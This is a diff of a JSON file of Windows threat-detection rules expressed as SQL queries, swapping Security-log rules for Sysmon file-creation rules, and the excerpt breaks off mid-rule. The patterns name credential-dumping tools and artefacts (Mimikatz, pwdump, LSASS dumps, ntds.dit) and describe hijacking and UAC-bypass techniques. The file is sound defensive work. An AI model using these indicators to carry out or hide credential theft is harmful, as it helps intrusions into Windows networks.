"level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + 
"status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Files with 
well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Legitimate Administrator using tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", - "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = 
'4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName 
LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", + "status": "experimental", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.execution", - "attack.t1003.001", "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.t1003.003" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR 
ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ - "cve.2021.42278", - "cve.2021.42287", "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE 
'\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ + "attack.persistence", + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1027" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "title": "LSASS Process Dump Artefact In CrashDumps 
Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 
"attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "cve.2021.44077" ], "falsepositives": [ - "Programs that connect locally to the RDP port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "status": "experimental", - "description": "Detects suspicious scheduled task creation events. 
Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Administrative activity", + "PowerShell scripts running as SYSTEM user" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" + ], + "filename": "file_event_win_susp_system_interactive_powershell.yml" + }, + { + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "status": "experimental", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent 
LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the creation of tasks from processes executed from suspicious 
